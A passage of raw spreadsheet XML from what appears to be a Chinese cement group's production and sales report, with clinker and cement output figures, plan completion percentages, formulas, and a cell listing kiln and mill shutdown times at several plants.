        <v>65.0187527522936</v>
      </c>
      <c r="I24" s="147">
        <f t="shared" si="3"/>
        <v>4811.609</v>
      </c>
      <c r="J24" s="147">
        <f t="shared" si="4"/>
        <v>148965.015</v>
      </c>
      <c r="K24" s="147">
        <f t="shared" si="5"/>
        <v>1520142.101</v>
      </c>
      <c r="L24" s="127">
        <v>2180000</v>
      </c>
      <c r="M24" s="148">
        <f>$K$24/$L$24*100</f>
        <v>69.7312890366972</v>
      </c>
      <c r="N24" s="154"/>
      <c r="O24" s="154"/>
      <c r="P24" s="154"/>
      <c r="Q24" s="107">
        <f ca="1">INDIRECT($T$4&amp;"!M51")</f>
        <v>52700.2579999998</v>
      </c>
      <c r="R24" s="155" t="s">
        <v>304</v>
      </c>
      <c r="S24" s="155">
        <f>'31'!Z49+'31'!Z50</f>
        <v>2743.32610000004</v>
      </c>
      <c r="T24" s="130">
        <f>3.725+1.2+1.2+2.4</f>
        <v>8.525</v>
      </c>
      <c r="U24" s="110">
        <f ca="1" t="shared" si="6"/>
        <v>61.8184844574778</v>
      </c>
    </row>
    <row r="25" customHeight="1" spans="2:27">
      <c r="B25" s="112"/>
      <c r="C25" s="96" t="s">
        <v>348</v>
      </c>
      <c r="D25" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!G41")</f>
        <v>0</v>
      </c>
      <c r="E25" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!H41")</f>
        <v>2156</v>
      </c>
      <c r="F25" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!I41")</f>
        <v>127132</v>
      </c>
      <c r="G25" s="153">
        <v>200000</v>
      </c>
      <c r="H25" s="152">
        <f ca="1">$F$25/$G$25*100</f>
        <v>63.566</v>
      </c>
      <c r="I25" s="147">
        <f t="shared" si="3"/>
        <v>456.65</v>
      </c>
      <c r="J25" s="147">
        <f t="shared" si="4"/>
        <v>27253.05</v>
      </c>
      <c r="K25" s="147">
        <f t="shared" si="5"/>
        <v>149541.19</v>
      </c>
      <c r="L25" s="127">
        <v>200000</v>
      </c>
      <c r="M25" s="148">
        <f>$K$25/$L$25*100</f>
        <v>74.770595</v>
      </c>
      <c r="N25" s="154"/>
      <c r="O25" s="154"/>
      <c r="P25" s="154"/>
      <c r="Q25" s="107">
        <f ca="1">INDIRECT($T$4&amp;"!M41")</f>
        <v>25592.59</v>
      </c>
      <c r="R25" s="155" t="s">
        <v>345</v>
      </c>
      <c r="S25" s="155">
        <f>S22+S23+S24</f>
        <v>14826.1341</v>
      </c>
      <c r="T25" s="130">
        <v>3.376</v>
      </c>
      <c r="U25" s="110">
        <f ca="1" t="shared" si="6"/>
        <v>75.8074348341232</v>
      </c>
    </row>
    <row r="26" customHeight="1" spans="2:27">
      <c r="B26" s="112"/>
      <c r="C26" s="96" t="s">
        <v>349</v>
      </c>
      <c r="D26" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!G61")</f>
        <v>4090</v>
      </c>
      <c r="E26" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!H61")</f>
        <v>24905</v>
      </c>
      <c r="F26" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!I61")</f>
        <v>1140778</v>
      </c>
      <c r="G26" s="153">
        <v>1250000</v>
      </c>
      <c r="H26" s="152">
        <f ca="1">$F$26/$G$26*100</f>
        <v>91.26224</v>
      </c>
      <c r="I26" s="147">
        <f t="shared" si="3"/>
        <v>3998.86</v>
      </c>
      <c r="J26" s="147">
        <f t="shared" si="4"/>
        <v>122182</v>
      </c>
      <c r="K26" s="147">
        <f t="shared" si="5"/>
        <v>1232208.52</v>
      </c>
      <c r="L26" s="127">
        <v>1250000</v>
      </c>
      <c r="M26" s="148">
        <f>$K$26/$L$26*100</f>
        <v>98.5766816</v>
      </c>
      <c r="N26" s="154"/>
      <c r="O26" s="154"/>
      <c r="P26" s="154"/>
      <c r="Q26" s="107">
        <f ca="1">INDIRECT($T$4&amp;"!M61")</f>
        <v>36448.7999999999</v>
      </c>
      <c r="R26" s="107"/>
      <c r="S26" s="107"/>
      <c r="T26" s="130">
        <v>5.2</v>
      </c>
      <c r="U26" s="110">
        <f ca="1" t="shared" si="6"/>
        <v>70.093846153846</v>
      </c>
    </row>
    <row r="27" customHeight="1" spans="2:27">
      <c r="B27" s="112"/>
      <c r="C27" s="96" t="s">
        <v>321</v>
      </c>
      <c r="D27" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!G68")</f>
        <v>0</v>
      </c>
      <c r="E27" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!H68")</f>
        <v>0</v>
      </c>
      <c r="F27" s="151">
        <f ca="1">INDIRECT($T$4&amp;"!I68")</f>
        <v>0</v>
      </c>
      <c r="G27" s="153">
        <v>0</v>
      </c>
      <c r="H27" s="152" t="e">
        <f ca="1">$F$27/$G$27*100</f>
        <v>#DIV/0!</v>
      </c>
      <c r="I27" s="147">
        <f>VLOOKUP(C27,日销售量,(1+$T$4),FALSE)</f>
        <v>0</v>
      </c>
      <c r="J27" s="147">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K27" s="147">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="L27" s="127">
        <v>0</v>
      </c>
      <c r="M27" s="148" t="e">
        <f>$K$27/$L$27*100</f>
        <v>#DIV/0!</v>
      </c>
      <c r="N27" s="154"/>
      <c r="O27" s="154"/>
      <c r="P27" s="154"/>
      <c r="Q27" s="107">
        <f ca="1">INDIRECT($T$4&amp;"!M68")</f>
        <v>1502.56</v>
      </c>
      <c r="R27" s="107"/>
      <c r="S27" s="107"/>
      <c r="T27" s="130">
        <v>2.3</v>
      </c>
      <c r="U27" s="110">
        <f ca="1" t="shared" si="6"/>
        <v>6.53286956521739</v>
      </c>
      <c r="X27"/>
      <c r="AA27"/>
    </row>
    <row r="28" customHeight="1" spans="2:27">
      <c r="B28" s="156"/>
      <c r="C28" s="96" t="s">
        <v>345</v>
      </c>
      <c r="D28" s="157">
        <f ca="1">SUM(D20:D27)-D20--D22</f>
        <v>20693.92</v>
      </c>
      <c r="E28" s="157">
        <f ca="1">SUM(E20:E27)-E20--E22</f>
        <v>152988.85</v>
      </c>
      <c r="F28" s="157">
        <f ca="1">SUM(F20:F27)-F20-F22</f>
        <v>6245312.81</v>
      </c>
      <c r="G28" s="157">
        <f t="shared" ref="G28" si="7">SUM(G20:G27)-G20</f>
        <v>7770000</v>
      </c>
      <c r="H28" s="158">
        <f ca="1">$F$28/$G$28*100</f>
        <v>80.3772562419562</v>
      </c>
      <c r="I28" s="159">
        <f>SUM(I20:I27)-I20</f>
        <v>23021.509</v>
      </c>
      <c r="J28" s="159">
        <f t="shared" ref="J28:L28" si="8">SUM(J20:J27)-J20</f>
        <v>699897.095</v>
      </c>
      <c r="K28" s="159">
        <f t="shared" si="8"/>
        <v>6743485.391</v>
      </c>
      <c r="L28" s="159">
        <f t="shared" si="8"/>
        <v>7770000</v>
      </c>
      <c r="M28" s="160">
        <f>$K$28/$L$28*100</f>
        <v>86.7887437709138</v>
      </c>
      <c r="N28" s="143"/>
      <c r="O28" s="143"/>
      <c r="P28" s="143"/>
      <c r="Q28" s="144">
        <f ca="1">SUM(Q20:Q27)-Q20</f>
        <v>257123.798</v>
      </c>
      <c r="R28" s="144"/>
      <c r="S28" s="144"/>
      <c r="T28" s="161">
        <f>SUM(T21:T27)</f>
        <v>39.113</v>
      </c>
      <c r="U28" s="146">
        <f ca="1" t="shared" si="6"/>
        <v>65.7387052898013</v>
      </c>
    </row>
    <row r="29" ht="99" customHeight="1" spans="2:27">
      <c r="B29" s="162" t="s">
        <v>286</v>
      </c>
      <c r="C29" s="163"/>
      <c r="D29" s="164" t="str">
        <f ca="1">"1."&amp;INDIRECT($T$4&amp;"!P56")&amp;"："&amp;INDIRECT($T$4&amp;"!Q56")&amp;CHAR(10)&amp;"2."&amp;INDIRECT($T$4&amp;"!P59")&amp;"："&amp;INDIRECT($T$4&amp;"!Q59")&amp;CHAR(10)&amp;"3."&amp;INDIRECT($T$4&amp;"!P62")&amp;"："&amp;INDIRECT($T$4&amp;"!Q62")&amp;CHAR(10)&amp;"4."&amp;INDIRECT($T$4&amp;"!P65")&amp;"："&amp;INDIRECT($T$4&amp;"!Q65")&amp;CHAR(10)&amp;"5."&amp;INDIRECT($T$4&amp;"!P68")&amp;"："&amp;INDIRECT($T$4&amp;"!Q68")&amp;CHAR(10)&amp;"6."&amp;INDIRECT($T$4&amp;"!P71")&amp;"："&amp;INDIRECT($T$4&amp;"!Q71")&amp;CHAR(10)&amp;"7."&amp;INDIRECT($T$4&amp;"!P74")&amp;"："&amp;INDIRECT($T$4&amp;"!Q74")&amp;CHAR(10)</f>
        <v>1.安砂建福：1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-22:40避峰停机；2#磨：8:30-22:10避峰停机；3#磨：10:00-22:10避峰停机；4#磨：7:00-24:00库满停机。
2.永安建福：窑:正常。A组磨：8:20-24:00避峰停机。D1#磨：8:30-24:00避峰停机，D2#磨：8:30-24:00避峰停机。
3.金银湖水泥：窑:续停。水泥磨:续停。
4.顺昌炼石：1#窑:续停；2#窑:续停；1#磨:7:00-24:00库满停机。2#磨:正常。3#磨:8:00-24:00避峰停机。
5.福州炼石：1#磨14:30-22:15避峰停机:7.75小时(避峰)。2#磨10:00-22:15避峰停机:12.25小时(避峰)。
6.宁德建福：水泥磨:00：00-24:00续停机。
7.安砂建福德化：2#磨：续停。
</v>
      </c>
      <c r="E29" s="165"/>
      <c r="F29" s="165"/>
      <c r="G29" s="165"/>
      <c r="H29" s="165"/>
      <c r="I29" s="165"/>
      <c r="J29" s="165"/>
      <c r="K29" s="165"/>
      <c r="L29" s="165"/>
      <c r="M29" s="165"/>
      <c r="N29" s="165"/>
      <c r="O29" s="165"/>
      <c r="P29" s="165"/>
      <c r="Q29" s="165"/>
      <c r="R29" s="165"/>
      <c r="S29" s="165"/>
      <c r="T29" s="165"/>
      <c r="U29" s="166"/>
      <c r="Z29" s="72" t="s">
        <v>362</v>
      </c>
    </row>
    <row r="32" spans="2:27">
      <c r="E32" s="167"/>
    </row>
    <row r="33" spans="5:5">
      <c r="E33" s="170"/>
    </row>
    <row r="35" ht="124.5" customHeight="1"/>
  </sheetData>
  <mergeCells count="30">
    <mergeCell ref="B2:U2"/>
    <mergeCell ref="D5:H5"/>
    <mergeCell ref="I5:M5"/>
    <mergeCell ref="N5:P5"/>
    <mergeCell ref="Q5:S5"/>
    <mergeCell ref="B29:C29"/>
    <mergeCell ref="D29:U29"/>
    <mergeCell ref="B7:B19"/>
    <mergeCell ref="B20:B28"/>
    <mergeCell ref="I7:I9"/>
    <mergeCell ref="I12:I15"/>
    <mergeCell ref="J7:J9"/>
    <mergeCell ref="J12:J15"/>
    <mergeCell ref="K7:K9"/>
    <mergeCell ref="K12:K15"/>
    <mergeCell ref="L7:L9"/>
    <mergeCell ref="L12:L15"/>
    <mergeCell ref="M7:M9"/>
    <mergeCell ref="M12:M15"/>
    <mergeCell ref="N7:N9"/>
    <mergeCell ref="N12:N14"/>
    <mergeCell ref="O7:O9"/>
    <mergeCell ref="O12:O14"/>
    <mergeCell ref="P7:P9"/>
    <mergeCell ref="P12:P14"/>
    <mergeCell ref="R7:R9"/>
    <mergeCell ref="R12:R15"/>
    <mergeCell ref="T5:T6"/>
    <mergeCell ref="U5:U6"/>
    <mergeCell ref="B5:C6"/>
  </mergeCells>
  <conditionalFormatting sqref="U7:U28">
    <cfRule type="cellIs" dxfId="0" priority="1" operator="greaterThan">
      <formula>95</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="1" priority="2" operator="greaterThan">
      <formula>85</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="2" priority="3" stopIfTrue="1" operator="greaterThan">
      <formula>80</formula>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait"/>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B1:AF35"/>
  <sheetViews>
    <sheetView tabSelected="1" zoomScale="90" zoomScaleNormal="90" workbookViewId="0">
      <selection activeCell="I26" sqref="I26"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="12"/>
  <cols>
    <col min="1" max="1" width="3.5" style="72" customWidth="1"/>
    <col min="2" max="2" width="2.875" style="72" customWidth="1"/>
    <col min="3" max="3" width="11.25" style="72" customWidth="1"/>
    <col min="4" max="4" width="8" style="72" customWidth="1"/>
    <col min="5" max="6" width="9.375" style="72" customWidth="1"/>
    <col min="7" max="7" width="7.625" style="72" customWidth="1"/>
    <col min="8" max="8" width="8.125" style="72" customWidth="1"/>
    <col min="9" max="10" width="8.75" style="72" customWidth="1"/>
    <col min="11" max="11" width="7.25" style="72" customWidth="1"/>
    <col min="12" max="14" width="5.875" style="72" hidden="1" customWidth="1"/>
    <col min="15" max="17" width="6.875" style="72" customWidth="1"/>
    <col min="18" max="19" width="10" style="72" customWidth="1"/>
    <col min="20" max="20" width="12.75" style="72" customWidth="1"/>
    <col min="21" max="21" width="10.25" style="72" customWidth="1"/>
    <col min="22" max="22" width="9.375" style="72" customWidth="1"/>
    <col min="23" max="23" width="10.25" style="72" customWidth="1"/>
    <col min="24" max="24" width="11.125" style="72"/>
    <col min="25" max="16384" width="9" style="72"/>
  </cols>
  <sheetData>
    <row r="1" ht="15" customHeight="1"/>
    <row r="2" ht="22.5" customHeight="1" spans="2:32">
      <c r="B2" s="73" t="s">
        <v>334</v>
      </c>
      <c r="C2" s="73"/>
      <c r="D2" s="73"/>
      <c r="E2" s="73"/>
      <c r="F2" s="73"/>
      <c r="G2" s="73"/>
      <c r="H2" s="73"/>
      <c r="I2" s="73"/>
      <c r="J2" s="73"/>
      <c r="K2" s="73"/>
      <c r="L2" s="73"/>
      <c r="M2" s="73"/>
      <c r="N2" s="73"/>
      <c r="O2" s="73"/>
      <c r="P2" s="73"/>
      <c r="Q2" s="73"/>
      <c r="R2" s="73"/>
      <c r="S2" s="73"/>
      <c r="U2" s="74"/>
      <c r="V2" s="74" t="s">
        <v>335</v>
      </c>
      <c r="W2" s="74" t="s">
        <v>336</v>
      </c>
    </row>
    <row r="3" ht="10.5" customHeight="1" spans="2:32">
      <c r="B3" s="73"/>
      <c r="C3" s="73"/>
      <c r="D3" s="73"/>
      <c r="E3" s="73"/>
      <c r="F3" s="73"/>
      <c r="G3" s="73"/>
      <c r="H3" s="73"/>
      <c r="I3" s="73"/>
      <c r="J3" s="73"/>
      <c r="K3" s="73"/>
      <c r="L3" s="73"/>
      <c r="M3" s="73"/>
      <c r="N3" s="73"/>
      <c r="O3" s="73"/>
      <c r="P3" s="73"/>
      <c r="Q3" s="73"/>
      <c r="R3" s="73"/>
      <c r="S3" s="73"/>
      <c r="U3" s="74" t="s">
        <v>229</v>
      </c>
      <c r="V3" s="75">
        <f>ROUND([10]月报!$L$70,0)</f>
        <v>0</v>
      </c>
      <c r="W3" s="76"/>
    </row>
    <row r="4" ht="16.5" customHeight="1" spans="2:32">
      <c r="H4" s="77"/>
      <c r="I4" s="77"/>
      <c r="J4" s="77"/>
      <c r="K4" s="77"/>
      <c r="L4" s="77"/>
      <c r="M4" s="78"/>
      <c r="N4" s="78"/>
      <c r="O4" s="78" t="s">
        <v>337</v>
      </c>
      <c r="P4" s="79">
        <v>12</v>
      </c>
      <c r="Q4" s="77" t="s">
        <v>224</v>
      </c>
      <c r="R4" s="79" t="s">
        <v>363</v>
      </c>
      <c r="S4" s="77" t="s">
        <v>223</v>
      </c>
      <c r="U4" s="74" t="s">
        <v>237</v>
      </c>
      <c r="V4" s="75">
        <f>ROUND([11]月报!$L$63,0)</f>
        <v>10467</v>
      </c>
      <c r="W4" s="76"/>
    </row>
    <row r="5" ht="14.25" customHeight="1" spans="2:32">
      <c r="B5" s="80" t="s">
        <v>211</v>
      </c>
      <c r="C5" s="81"/>
      <c r="D5" s="82" t="s">
        <v>364</v>
      </c>
      <c r="E5" s="82"/>
      <c r="F5" s="82"/>
      <c r="G5" s="83"/>
      <c r="H5" s="84" t="s">
        <v>330</v>
      </c>
      <c r="I5" s="84"/>
      <c r="J5" s="84"/>
      <c r="K5" s="85"/>
      <c r="L5" s="86" t="s">
        <v>284</v>
      </c>
      <c r="M5" s="87"/>
      <c r="N5" s="88"/>
      <c r="O5" s="89" t="s">
        <v>339</v>
      </c>
      <c r="P5" s="89"/>
      <c r="Q5" s="89"/>
      <c r="R5" s="90" t="s">
        <v>340</v>
      </c>
      <c r="S5" s="91" t="s">
        <v>341</v>
      </c>
      <c r="U5" s="74" t="s">
        <v>304</v>
      </c>
      <c r="V5" s="75">
        <f>ROUND([13]月报!$L$67,0)</f>
        <v>0</v>
      </c>
      <c r="W5" s="76"/>
    </row>
    <row r="6" spans="2:32">
      <c r="B6" s="92"/>
      <c r="C6" s="93"/>
      <c r="D6" s="94" t="s">
        <v>215</v>
      </c>
      <c r="E6" s="94" t="s">
        <v>216</v>
      </c>
      <c r="F6" s="94" t="s">
        <v>343</v>
      </c>
      <c r="G6" s="94" t="s">
        <v>344</v>
      </c>
      <c r="H6" s="95" t="s">
        <v>215</v>
      </c>
      <c r="I6" s="95" t="s">
        <v>216</v>
      </c>
      <c r="J6" s="95" t="s">
        <v>343</v>
      </c>
      <c r="K6" s="95" t="s">
        <v>344</v>
      </c>
      <c r="L6" s="96" t="s">
        <v>342</v>
      </c>
      <c r="M6" s="96" t="s">
        <v>215</v>
      </c>
      <c r="N6" s="96" t="s">
        <v>216</v>
      </c>
      <c r="O6" s="97" t="s">
        <v>345</v>
      </c>
      <c r="P6" s="97" t="s">
        <v>346</v>
      </c>
      <c r="Q6" s="97" t="s">
        <v>347</v>
      </c>
      <c r="R6" s="98"/>
      <c r="S6" s="99"/>
      <c r="U6" s="74" t="s">
        <v>348</v>
      </c>
      <c r="V6" s="75">
        <f>ROUND([12]月报!$L$54,0)</f>
        <v>31083</v>
      </c>
      <c r="W6" s="76"/>
    </row>
    <row r="7" customHeight="1" spans="2:32">
      <c r="B7" s="100" t="s">
        <v>283</v>
      </c>
      <c r="C7" s="96" t="s">
        <v>312</v>
      </c>
      <c r="D7" s="101">
        <f ca="1">INDIRECT($R$4&amp;"!H22")</f>
        <v>62660</v>
      </c>
      <c r="E7" s="101">
        <f ca="1">INDIRECT($R$4&amp;"!I22")</f>
        <v>2093641</v>
      </c>
      <c r="F7" s="102">
        <v>2115200</v>
      </c>
      <c r="G7" s="103">
        <f ca="1">$E$7/$F$7*100</f>
        <v>98.9807583207262</v>
      </c>
      <c r="H7" s="104">
        <f>VLOOKUP(C7&amp;"商品熟料",日销售量,(33),FALSE)</f>
        <v>473.78</v>
      </c>
      <c r="I7" s="104">
        <f>VLOOKUP(C7&amp;"商品熟料",日销售量,(34),FALSE)</f>
        <v>79794.63</v>
      </c>
      <c r="J7" s="104">
        <v>50000</v>
      </c>
      <c r="K7" s="105">
        <f>$I$7/$J$7*100</f>
        <v>159.58926</v>
      </c>
      <c r="L7" s="106">
        <f ca="1">INDIRECT($R$4&amp;"!G23")</f>
        <v>0</v>
      </c>
      <c r="M7" s="106">
        <f ca="1">INDIRECT($R$4&amp;"!H23")</f>
        <v>0</v>
      </c>
      <c r="N7" s="106">
        <f ca="1">INDIRECT($R$4&amp;"!I23")</f>
        <v>0</v>
      </c>
      <c r="O7" s="107">
        <f ca="1">INDIRECT($R$4&amp;"!M22")+INDIRECT($R$4&amp;"!M23")+INDIRECT($R$4&amp;"!M24")</f>
        <v>45275.442</v>
      </c>
      <c r="P7" s="108">
        <f>ROUND([10]月报!$L$70,0)</f>
        <v>0</v>
      </c>
      <c r="Q7" s="107">
        <f ca="1">O7-P7</f>
        <v>45275.442</v>
      </c>
      <c r="R7" s="109">
        <f>5.5+15+0.7</f>
        <v>21.2</v>
      </c>
      <c r="S7" s="110">
        <f ca="1">(O7-V3)/R7*100/10000</f>
        <v>21.3563405660377</v>
      </c>
      <c r="U7" s="111" t="s">
        <v>349</v>
      </c>
      <c r="V7" s="75">
        <f>ROUND([14]月报!$T$44,0)</f>
        <v>0</v>
      </c>
      <c r="W7" s="76">
        <v>0</v>
      </c>
    </row>
    <row r="8" customHeight="1" spans="2:32">
      <c r="B8" s="112"/>
      <c r="C8" s="96" t="s">
        <v>350</v>
      </c>
      <c r="D8" s="101">
        <f>[10]月报!$F$18</f>
        <v>62660</v>
      </c>
      <c r="E8" s="101">
        <f>[10]月报!$G$18</f>
        <v>1409996</v>
      </c>
      <c r="F8" s="102">
        <v>1950000</v>
      </c>
      <c r="G8" s="103">
        <f>$E$8/$F$8*100</f>
        <v>72.3074871794872</v>
      </c>
      <c r="H8" s="113"/>
      <c r="I8" s="113"/>
      <c r="J8" s="113"/>
      <c r="K8" s="114"/>
      <c r="L8" s="115"/>
      <c r="M8" s="115"/>
      <c r="N8" s="115"/>
      <c r="O8" s="107">
        <f>[10]月报!$L$18</f>
        <v>8979.927</v>
      </c>
      <c r="P8" s="116"/>
      <c r="Q8" s="107">
        <f t="shared" ref="Q8:Q15" si="0">O8-P8</f>
        <v>8979.927</v>
      </c>
      <c r="R8" s="109">
        <v>5.5</v>
      </c>
      <c r="S8" s="110">
        <f>(O8)/R8*100/10000</f>
        <v>16.32714</v>
      </c>
      <c r="T8" s="117"/>
      <c r="U8" s="118" t="s">
        <v>345</v>
      </c>
      <c r="V8" s="119">
        <f>SUM(V3:V7)</f>
        <v>41550</v>
      </c>
      <c r="W8" s="118">
        <f>SUM(W3:W7)</f>
        <v>0</v>
      </c>
    </row>
    <row r="9" customHeight="1" spans="2:32">
      <c r="B9" s="112"/>
      <c r="C9" s="96" t="s">
        <v>351</v>
      </c>
      <c r="D9" s="101">
        <f>[10]月报!$F$19</f>
        <v>0</v>
      </c>
      <c r="E9" s="101">
        <f>[10]月报!$G$19</f>
        <v>683645</v>
      </c>
      <c r="F9" s="102">
        <v>165200</v>
      </c>
      <c r="G9" s="103">
        <f>$E$9/$F$9*100</f>
        <v>413.828692493947</v>
      </c>
      <c r="H9" s="120"/>
      <c r="I9" s="120"/>
      <c r="J9" s="120"/>
      <c r="K9" s="121"/>
      <c r="L9" s="122"/>
      <c r="M9" s="122"/>
      <c r="N9" s="122"/>
      <c r="O9" s="107">
        <f>[10]月报!$L$19</f>
        <v>36295.515</v>
      </c>
      <c r="P9" s="123"/>
      <c r="Q9" s="107">
        <f t="shared" si="0"/>
        <v>36295.515</v>
      </c>
      <c r="R9" s="109">
        <f>15+0.7</f>
        <v>15.7</v>
      </c>
      <c r="S9" s="110">
        <f>(O9)/R9*100/10000</f>
        <v>23.1181624203822</v>
      </c>
      <c r="T9" s="124"/>
    </row>
    <row r="10" customHeight="1" spans="2:32">
      <c r="B10" s="112"/>
      <c r="C10" s="96" t="s">
        <v>352</v>
      </c>
      <c r="D10" s="101">
        <f ca="1">INDIRECT($R$4&amp;"!H32")</f>
        <v>103574</v>
      </c>
      <c r="E10" s="101">
        <f ca="1">INDIRECT($R$4&amp;"!I32")</f>
        <v>1631417</v>
      </c>
      <c r="F10" s="125">
        <v>2041000</v>
      </c>
      <c r="G10" s="126">
        <f ca="1">$E$10/$F$10*100</f>
        <v>79.9322390984811</v>
      </c>
      <c r="H10" s="127">
        <f>VLOOKUP(C10&amp;"商品熟料",日销售量,(33),FALSE)</f>
        <v>0</v>
      </c>
      <c r="I10" s="127">
        <f>VLOOKUP(C10&amp;"商品熟料",日销售量,(34),FALSE)</f>
        <v>0</v>
      </c>
      <c r="J10" s="127">
        <v>0</v>
      </c>
      <c r="K10" s="128" t="e">
        <f>$I$8/$J$8*100</f>
        <v>#DIV/0!</v>
      </c>
      <c r="L10" s="129">
        <f ca="1">INDIRECT($R$4&amp;"!G33")</f>
        <v>0</v>
      </c>
      <c r="M10" s="129">
        <f ca="1">INDIRECT($R$4&amp;"!H33")</f>
        <v>0</v>
      </c>
      <c r="N10" s="129">
        <f ca="1">INDIRECT($R$4&amp;"!I33")</f>
        <v>0</v>
      </c>
      <c r="O10" s="107">
        <f ca="1">INDIRECT($R$4&amp;"!M32")+INDIRECT($R$4&amp;"!M33")+INDIRECT($R$4&amp;"!M34")</f>
        <v>36860.806</v>
      </c>
      <c r="P10" s="107">
        <f>ROUND([11]月报!$L$63,0)</f>
        <v>10467</v>
      </c>
      <c r="Q10" s="107">
        <f ca="1" t="shared" si="0"/>
        <v>26393.806</v>
      </c>
      <c r="R10" s="130">
        <v>5.9</v>
      </c>
      <c r="S10" s="110">
        <f ca="1">(O10-V4)/R10*100/10000</f>
        <v>44.7352644067797</v>
      </c>
      <c r="T10" s="124"/>
    </row>
    <row r="11" customHeight="1" spans="2:32">
      <c r="B11" s="112"/>
      <c r="C11" s="96" t="s">
        <v>348</v>
      </c>
      <c r="D11" s="101">
        <f ca="1">INDIRECT($R$4&amp;"!H42")</f>
        <v>0</v>
      </c>
      <c r="E11" s="101">
        <f ca="1">INDIRECT($R$4&amp;"!I42")</f>
        <v>0</v>
      </c>
      <c r="F11" s="125">
        <v>0</v>
      </c>
      <c r="G11" s="126" t="e">
        <f ca="1">$E$11/$F$11*100</f>
        <v>#DIV/0!</v>
      </c>
      <c r="H11" s="127">
        <f>VLOOKUP(C11&amp;"商品熟料",日销售量,(33),FALSE)</f>
        <v>0</v>
      </c>
      <c r="I11" s="127">
        <f>VLOOKUP(C11&amp;"商品熟料",日销售量,(34),FALSE)</f>
        <v>0</v>
      </c>
      <c r="J11" s="127">
        <v>0</v>
      </c>
      <c r="K11" s="128" t="e">
        <f>$I$9/$J$9*100</f>
        <v>#DIV/0!</v>
      </c>
      <c r="L11" s="129">
        <f ca="1">INDIRECT($R$4&amp;"!G53")</f>
        <v>0</v>
      </c>
      <c r="M11" s="129">
        <f ca="1">INDIRECT($R$4&amp;"!H53")</f>
        <v>0</v>
      </c>
      <c r="N11" s="129">
        <f ca="1">INDIRECT($R$4&amp;"!I53")</f>
        <v>0</v>
      </c>
      <c r="O11" s="107">
        <f ca="1">INDIRECT($R$4&amp;"!M42")+INDIRECT($R$4&amp;"!M43")+INDIRECT($R$4&amp;"!M44")</f>
        <v>48773.78</v>
      </c>
      <c r="P11" s="107">
        <f>ROUND([12]月报!$L$54,0)</f>
        <v>31083</v>
      </c>
      <c r="Q11" s="107">
        <f ca="1" t="shared" si="0"/>
        <v>17690.78</v>
      </c>
      <c r="R11" s="130">
        <f>5+0.15</f>
        <v>5.15</v>
      </c>
      <c r="S11" s="110">
        <f ca="1">(O11-V6)/R11*100/10000</f>
        <v>34.3510291262136</v>
      </c>
      <c r="T11" s="124"/>
    </row>
    <row r="12" customHeight="1" spans="2:32">
      <c r="B12" s="112"/>
      <c r="C12" s="96" t="s">
        <v>304</v>
      </c>
      <c r="D12" s="101">
        <f ca="1">INDIRECT($R$4&amp;"!H52")</f>
        <v>60840.1700000006</v>
      </c>
      <c r="E12" s="101">
        <f ca="1">INDIRECT($R$4&amp;"!I52")</f>
        <v>1444407.42</v>
      </c>
      <c r="F12" s="102">
        <v>1852600</v>
      </c>
      <c r="G12" s="103">
        <f ca="1">$E$12/$F$12*100</f>
        <v>77.9665022131059</v>
      </c>
      <c r="H12" s="104">
        <f>VLOOKUP(C12&amp;"商品熟料",日销售量,(33),FALSE)</f>
        <v>9194.742</v>
      </c>
      <c r="I12" s="104">
        <f>VLOOKUP(C12&amp;"商品熟料",日销售量,(34),FALSE)</f>
        <v>44694.949</v>
      </c>
      <c r="J12" s="104">
        <v>50000</v>
      </c>
      <c r="K12" s="131">
        <f>$I$12/$J$12*100</f>
        <v>89.389898</v>
      </c>
      <c r="L12" s="106">
        <f ca="1">INDIRECT($R$4&amp;"!G63")</f>
        <v>0</v>
      </c>
      <c r="M12" s="106">
        <f ca="1">INDIRECT($R$4&amp;"!H63")</f>
        <v>0</v>
      </c>
      <c r="N12" s="106">
        <f ca="1">INDIRECT($R$4&amp;"!I63")</f>
        <v>0</v>
      </c>
      <c r="O12" s="107">
        <f ca="1">INDIRECT($R$4&amp;"!M52")+INDIRECT($R$4&amp;"!M53")</f>
        <v>36764.4730000508</v>
      </c>
      <c r="P12" s="108">
        <f>ROUND([13]月报!$L$67,0)</f>
        <v>0</v>
      </c>
      <c r="Q12" s="107">
        <f ca="1" t="shared" si="0"/>
        <v>36764.4730000508</v>
      </c>
      <c r="R12" s="109">
        <f>1.8+0.3+12+1.5+0.26*3+0.26</f>
        <v>16.64</v>
      </c>
      <c r="S12" s="110">
        <f ca="1">(O12-V5)/R12*100/10000</f>
        <v>22.0940342548382</v>
      </c>
      <c r="T12" s="117"/>
    </row>
    <row r="13" customHeight="1" spans="2:32">
      <c r="B13" s="112"/>
      <c r="C13" s="96" t="s">
        <v>353</v>
      </c>
      <c r="D13" s="101">
        <f>[13]月报!$F$20</f>
        <v>3.1e-10</v>
      </c>
      <c r="E13" s="101">
        <f>[13]月报!$G$20</f>
        <v>3.41e-9</v>
      </c>
      <c r="F13" s="102">
        <v>0</v>
      </c>
      <c r="G13" s="103" t="e">
        <f>$E$13/$F$13*100</f>
        <v>#DIV/0!</v>
      </c>
      <c r="H13" s="113"/>
      <c r="I13" s="113"/>
      <c r="J13" s="113"/>
      <c r="K13" s="132"/>
      <c r="L13" s="115"/>
      <c r="M13" s="115"/>
      <c r="N13" s="115"/>
      <c r="O13" s="107">
        <f>[13]月报!$Y$92</f>
        <v>4206.04</v>
      </c>
      <c r="P13" s="116"/>
      <c r="Q13" s="107">
        <f t="shared" si="0"/>
        <v>4206.04</v>
      </c>
      <c r="R13" s="109">
        <f>1.8+0.3</f>
        <v>2.1</v>
      </c>
      <c r="S13" s="110">
        <f>O13/R13*100/10000</f>
        <v>20.0287619047619</v>
      </c>
